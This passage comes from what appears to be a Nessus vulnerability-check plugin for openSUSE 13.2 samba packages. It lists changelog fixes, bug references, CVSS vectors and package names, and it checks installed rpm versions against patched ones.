(bso#11014).\n\n - pdb_get_trusteddom_pw() fails with non valid UTF16\n random passwords; (bso#11016).\n\n - Make Sharepoint search show user documents; (bso#11022).\n\n - nss_wrapper: check for nss.h; (bso#11026).\n\n - Enable mutexes in gencache_notrans.tdb; (bso#11032).\n\n - tdb_wrap: Make mutexes easier to use; (bso#11032).\n\n - lib/util: Avoid collision which alread defined consumer\n DEBUG macro; (bso#11033).\n\n - winbind: Retry after SESSION_EXPIRED error in ping-dc;\n (bso#11034).\n\n - s3-libads: Fix a possible segfault in\n kerberos_fetch_pac(); (bso#11037).\n\n - vfs_fruit: Fix base_fsp name conversion; (bso#11039).\n\n - vfs_fruit: mmap under FreeBSD needs PROT_READ;\n (bso#11040).\n\n - Fix authentication using Kerberos (not AD); (bso#11044).\n\n - net: Fix sam addgroupmem; (bso#11051).\n\n - vfs_snapper: Correctly handles multi-byte DBus strings;\n (bso#11055); (boo#913238).\n\n - cli_connect_nb_send: Don't segfault on host == NULL;\n (bso#11058).\n\n - utils: Fix 'net time' segfault; (bso#11058).\n\n - libsmb: Provide authinfo domain for encrypted session\n referrals; (bso#11059).\n\n - s3-pam_smbpass: Fix memory leak in\n pam_sm_authenticate(); (bso#11066).\n\n - vfs_glusterfs: Add comments to the pipe(2) code;\n (bso#11069).\n\n - vfs/glusterfs: Change xattr key to match gluster key;\n (bso#11069).\n\n - vfs_glusterfs: Implement AIO support; (bso#11069).\n\n - s3-vfs: Fix developer build of vfs_ceph module;\n (bso#11070).\n\n - s3: netlogon: Ensure we don't call talloc_free on an\n uninitialized pointer; (bso#11077); CVE-2015-0240;\n (boo#917376).\n\n - vfs: Add a brief vfs_ceph manpage; (bso#11088).\n\n - s3: smbclient: Allinfo leaves the file handle open;\n (bso#11094).\n\n - Fix Win8.1 Credentials Manager issue after KB2992611 on\n Samba domain; (bso#11097).\n\n - debug: Set close-on-exec for the main log file FD;\n (bso#11100).\n\n - s3: smbd: leases - losen paranoia check. Stat opens can\n grant leases; (bso#11102).\n\n - s3: smbd: SMB2 close. If a file has delete on close,\n store the return info before deleting; (bso#11104).\n\n - doc:man:vfs_glusterfs: improve the configuration\n section; (bso#11117).\n\n - snprintf: Try to support %j; (bso#11119).\n\n - ctdb-io: Do not use sys_write to write to client\n sockets; (bso#11124).\n\n - doc-xml: Add 'sharesec' reference to 'access based share\n enum'; (bso#11127).\n\n - Fix usage of freed memory on server exit; (bso#11218);\n (boo#919309).\n\n - Adjust baselibs.conf due to libpdb0 package rename to\n libsamba-passdb0.\n\n - Add libsamba-debug, libsocket-blocking,\n libsamba-cluster-support, and libhttp to the libs\n package; (boo#913547).\n\n - Rebase File Server Remote VSS Protocol (FSRVP) server\n against 4.2.0rc1; (fate#313346).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=898031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=901813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=912457\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=913238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=913547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=914279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=917376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=919309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=924519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=936862\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=946051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=947552\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=949022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958581\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958582\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958583\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958584\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958585\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958586\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=964023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971965\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973033\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973036\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973832\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974629\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-pcp-pmda-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-pcp-pmda-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-tests-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"ctdb-tests-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-atsvc-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-atsvc0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-atsvc0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-binding0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-binding0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-samr-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-samr0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc-samr0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libdcerpc0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgensec-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgensec0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgensec0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-krb5pac-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-krb5pac0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-krb5pac0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-nbt-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-nbt0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-nbt0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-standard-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-standard0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr-standard0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libndr0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libnetapi-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libnetapi0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libnetapi0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libregistry-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libregistry0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libregistry0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-credentials-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-credentials0-4.2.4-34.1\") 